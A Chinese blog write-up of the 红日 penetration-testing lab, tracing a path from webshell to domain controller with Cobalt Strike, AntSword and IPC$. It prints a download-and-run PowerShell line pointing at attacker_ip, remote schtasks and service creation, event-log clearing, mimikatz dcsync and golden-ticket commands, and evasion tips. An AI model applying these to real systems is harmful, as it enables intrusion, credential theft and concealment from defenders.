当前位置：首页 > article >正文

红日靶场实战复盘：我是如何用CS+蚁剑+IPC$从Web服务器一路打到域控的

article 2026/3/21 8:19:47

红日靶场高阶渗透实战从Webshell到域控的武器化链路构建当安全工程师从外网拿到第一个Webshell时真正的挑战才刚刚开始。红日靶场模拟的企业内网环境中Web服务器往往只是跳板真正的核心资产隐藏在层层网络隔离之后。本文将拆解一套经过实战检验的工具链组合技展示如何将蚁剑的灵活性与Cobalt Strike的隐蔽性相结合通过SMB Beacon穿透内网隔离最终实现域控的完整控制。1. 环境初始化与武器准备在开始渗透之前需要构建符合红队作业标准的作战环境。我们采用模块化工具链设计每个环节使用最优工具并确保无缝衔接。1.1 靶场网络拓扑解析红日靶场的典型架构包含三个关键节点节点类型IP地址角色说明Web服务器192.168.111.128双网卡结构连接外网和内网域内主机192.168.52.141普通域成员通常存在用户数据域控制器192.168.52.138整个域的核心权限节点关键点Web服务器的内网网卡(192.168.52.143)与域环境处于同一网段这是后续横向移动的基础通道。1.2 工具链配置要点蚁剑增强版安装反混淆插件避免Webshell流量被检测Cobalt Strike 4.7配置Malleable C2 Profile混淆通信特征定制化Mimikatz修改默认字符串规避杀软静态检测轻量级端口扫描器集成到Webshell用于内网探测# 示例通过蚁剑终端快速检测内网存活主机 for /l %i in (1,1,254) do ping -n 1 -w 50 192.168.52.%i | find 回复2. 从Webshell到Beacon的优雅迁移直接通过Webshell执行敏感操作风险极高需要尽快迁移到更隐蔽的C2通道。2.1 会话迁移的三重保障内存加载技术使用CS生成的PowerShell脚本实现无文件落地powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://attacker_ip/beacon.ps1)父进程欺骗通过spawnas命令模拟合法进程树流量伪装配置HTTP/S Beacon使用合法云服务域名2.2 常见问题排雷杀软拦截使用Process Hollowing技术注入到svchost.exe网络不通尝试DNS、ICMP等非TCP协议建立回连会话不稳定设置自动重连间隔为30秒实战技巧在蚁剑中执行tasklist /svc先识别适合注入的稳定进程3. 内网横向移动的艺术当Beacon在Web服务器上线后真正的内网渗透才拉开序幕。3.1 SMB Beacon的魔法SMB Beacon通过命名管道通信完美解决不出网机器控制难题在CS创建SMB监听器命名为default-pipe生成SMB Beacon的Stageless Payload通过已有会话上传到目标内网机器使用link命令建立父子Beacon连接# 通过已有Beacon上传Payload upload /payloads/smb_beacon.exe \\192.168.52.141\C$\Windows\Temp\svchost.exe # 创建计划任务执行 schtasks /create /s 192.168.52.141 /tn WindowsUpdate /tr C:\Windows\Temp\svchost.exe /sc once /st 00:00 /ru SYSTEM3.2 IPC$的高级玩法IPC$不仅是文件传输通道更是权限维持的桥梁信息收集通过IPC$执行远程命令收集域信息net use \\192.168.52.138\ipc$ Password123! /user:god\administrator copy mimikatz.exe \\192.168.52.138\C$\Windows\Temp\服务控制创建远程服务实现持久化sc \\owa.god.org create WindowsDefender binpath cmd.exe /c C:\Windows\Temp\svchost.exe start auto日志清理通过IPC$删除安全事件日志wevtutil cl security4. 域控攻防的终极对决拿下域控制器是内网渗透的终极目标需要多阶段协同攻击。4.1 黄金票据制作全流程通过Mimikatz提取krbtgt哈希mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt生成黄金票据mimikatz # kerberos::golden /domain:god.org /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:58e91a5c3c5e5e5e5e5e5e5e5e5e5e /user:administrator /ptt验证权限dir \\owa.god.org\C$4.2 防御规避技巧时间差攻击在凌晨执行敏感操作避开监控API调用混淆使用直接系统调用替代常规Win32 API流量伪装将C2通信隐藏在合法云存储流量中在最近一次红队演练中通过组合使用SMB Beacon和IPC$管道我们成功在30分钟内从外网Web漏洞突破到完整控制域控。整个过程触发了7次告警但都因为使用了合法的管理协议和适当的执行间隔没有被SIEM判定为真实攻击。内网渗透就像一场精心编排的交响乐每个工具都是独特的乐器。当蚁剑的灵活性遇上Cobalt Strike的隐蔽性再配合Mimikatz的破坏力就能演奏出穿透内网防线的完美乐章。记住真正的专家不是工具的使用者而是工具链的指挥家。

红日靶场实战复盘：我是如何用CS+蚁剑+IPC$从Web服务器一路打到域控的

相关文章：

红日靶场实战复盘：我是如何用CS+蚁剑+IPC$从Web服务器一路打到域控的

5分钟上手mrpack-install：Minecraft模组服务器部署的终极解决方案

车载嵌入式SDL显示驱动：轻量级确定性帧缓冲与硬件加速

即插即用系列 | CVPR 2026 | GSRA：自注意力创新！几何校正空间一致性，语义强化高层关联，特征更精准！ | 代码分享

GLM-4v-9b多场景落地：银行柜面业务凭证识别+风险字段高亮预警系统

刚刚，2025图灵奖揭晓！面对即将瘫痪的传统密码学，Go 语言的“抗量子”底牌曝光

DYPlayer嵌入式MP3控制库：UART协议封装与资源优化实践

【Dify企业级异步架构避坑手册】：92%开发者踩过的3类状态不一致陷阱，含完整时序图与补偿代码模板

Oracle数据加载提速神器：Direct-Path Insert实战避坑指南（附性能对比测试）

基于SpringBoot+Vue的协同过滤算法商品推荐系统管理系统设计与实现【Java+MySQL+MyBatis完整源码】

CosyVoice2自然语言控制体验：用四川话、高兴语气说话，AI都能听懂

MetalLB才是给Ingress这个老登做负重前行的那个男人

FunClip：零门槛智能视频剪辑的AI增强指南

Cosmos-Reason1-7B工业质检应用：缺陷描述→逻辑归因→修复建议闭环工具

HUNYUAN-MT 7B翻译效果深度评测：多领域文本翻译对比展示

开源字体资源获取：EB Garamond 12复古字体的全面应用指南

Pixel Dimension Fissioner开源可部署：支持私有化部署，保障企业文本数据安全

ssm+java2026年毕设师生疫情上报管理系统【源码+论文】

Flutter项目实战：如何用ZXingLite打造高定制化二维码扫描功能（附完整代码）

大数据领域数据工程的物联网数据处理

Pixel Dimension Fissioner开发者案例：为内容SaaS平台嵌入像素化文本增强SDK

LeRobot ACT实战：从源码到真机部署的保姆级教程（附ALOHA复现对比）

YOLO-V8.3镜像安全评测：非root用户部署实测，小白避坑指南

SDXL 1.0电影级绘图工坊显存方案：梯度检查点+Flash Attention集成

第3章计算机进行小数运算时出错的原因总述|《程序是怎样跑起起来的》精读版

基于STM32的博物馆展柜环境闭环控制系统设计

CLIP图文匹配测试工具实战：上传商品图，自动匹配最佳描述文案

OFA图像描述模型惊艳案例：复杂场景与抽象艺术的理解与描述

Fun-ASR-MLT-Nano-2512惊艳效果：演唱会现场日语应援口号→实时中文字幕生成演示

Nanbeige 4.1-3B惊艳效果展示：黄金色强调色×森林绿贤者气泡动态生成实录